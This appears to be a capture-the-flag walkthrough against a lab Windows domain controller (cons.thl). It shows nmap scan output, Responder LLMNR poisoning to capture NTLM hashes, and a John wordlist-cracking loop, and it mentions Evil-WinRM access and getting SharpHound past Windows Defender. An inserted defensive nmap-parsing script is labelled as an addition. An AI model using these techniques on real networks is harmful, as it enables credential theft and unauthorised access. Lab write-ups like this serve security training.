Curiosity2



An initial scan:

 sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 192.168.1.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-12 12:33 EDT
Stats: 0:00:49 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 78.95% done; ETC: 12:34 (0:00:13 remaining)
Nmap scan report for 192.168.1.45
Host is up (0.0017s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-12 16:34:00Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
3269/tcp  open   ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49670/tcp closed unknown
49672/tcp closed unknown
49673/tcp closed unknown
49676/tcp closed unknown
49693/tcp open   msrpc         Microsoft Windows RPC
57936/tcp open   ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   192.168.1.45\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 57936
|_    Clustered: false
|_ssl-date: 2025-05-12T16:34:56+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
| ms-sql-ntlm-info: 
|   192.168.1.45\SQLEXPRESS: 
|     Target_Name: CONS
|     NetBIOS_Domain_Name: CONS
|     NetBIOS_Computer_Name: WIN-C73PROQLRHL
|     DNS_Domain_Name: cons.thl
|     DNS_Computer_Name: WIN-C73PROQLRHL.cons.thl
|_    Product_Version: 10.0.14393
64632/tcp closed unknown
64659/tcp closed unknown
MAC Address: 08:00:27:6B:26:18 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-C73PROQLRHL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6b:26:18 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-05-12T16:34:48
|_  start_date: 2025-05-12T16:19:29
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.40 seconds
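As an added example (not part of the original writeup), a small Python parser for the nmap -sV output above: it attaches the NSE script lines to their port and flags the two things a defender would note from this scan alone, the LDAP certificate's expiry date and the SQL Server reporting no post-release patches. The embedded excerpt is constructed from the scan above, and the 90-day warning threshold is an arbitrary assumption.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -sV output above (a few ports, not the full scan).
SAMPLE = """\
PORT      STATE  SERVICE       VERSION
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
445/tcp   open   microsoft-ds?
49670/tcp closed unknown
57936/tcp open   ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|       Post-SP patches applied: false
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
NOT_AFTER_RE = re.compile(r"Not valid after:\s+(\S+)")

def parse_ports(text):
    """Map port -> state/service/version plus the NSE script lines ('|', '|_')
    that nmap prints under that port."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"state": m.group(3), "service": m.group(4),
                              "version": m.group(5).strip(), "notes": []}
        elif line.startswith("|") and current is not None:
            ports[current]["notes"].append(line.lstrip("|_ ").rstrip())
    return ports

def review_points(ports, today_iso, warn_days=90):
    """Flag what a defender would follow up on from the scan alone: certificates
    expiring within warn_days of today_iso (YYYY-MM-DD) and an unpatched SQL Server."""
    today, findings = datetime.fromisoformat(today_iso), []
    for port, info in sorted(ports.items()):
        if info["state"] != "open":
            continue
        for note in info["notes"]:
            m = NOT_AFTER_RE.search(note)
            if m:
                days = (datetime.fromisoformat(m.group(1)) - today).days
                if days < warn_days:
                    findings.append(f"{port}/{info['service']}: certificate expires in {days} days")
            if "Post-SP patches applied: false" in note:
                findings.append(f"{port}/{info['service']}: SQL Server has no post-release patches")
    return findings
```

Running review_points(parse_ports(SAMPLE), "2025-05-12") reports only the SQL Server finding; closer to the certificate's expiry the LDAP entry is flagged as well.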

Now with nxc

  • We check some basic information about the machine:

nxc smb 192.168.1.45

We have a domain, cons.thl, and a machine name, WIN-C73PROQLRHL.

We add the domain and the FQDN to our /etc/hosts file:

echo '192.168.1.45 cons.thl WIN-C73PROQLRHL.cons.thl' | sudo tee -a /etc/hosts

We can then start an LLMNR poisoner with Responder and eventually capture something:

Tool:

sudo responder -I eth0

We obtain two hashes.

If we try to brute-force the hash with JohnTheRipper and the rockyou.txt wordlist, we are not able to crack it. However, if we use other wordlists from the SecLists repository (in a small Bash "for" loop) we get something:

for dict in *.txt; do echo -e "\n\n[+] Attempting with dictionary $dict"; john --wordlist="$dict" hash.hash; done

We can see that the user Appolonia belongs to the ManagedUsers group:

We log in with Evil-WinRM:

When using SharpHound

  • It was deleted by Windows Defender:

We try another repo and it works; now we have the .zip, which we load into BloodHound:
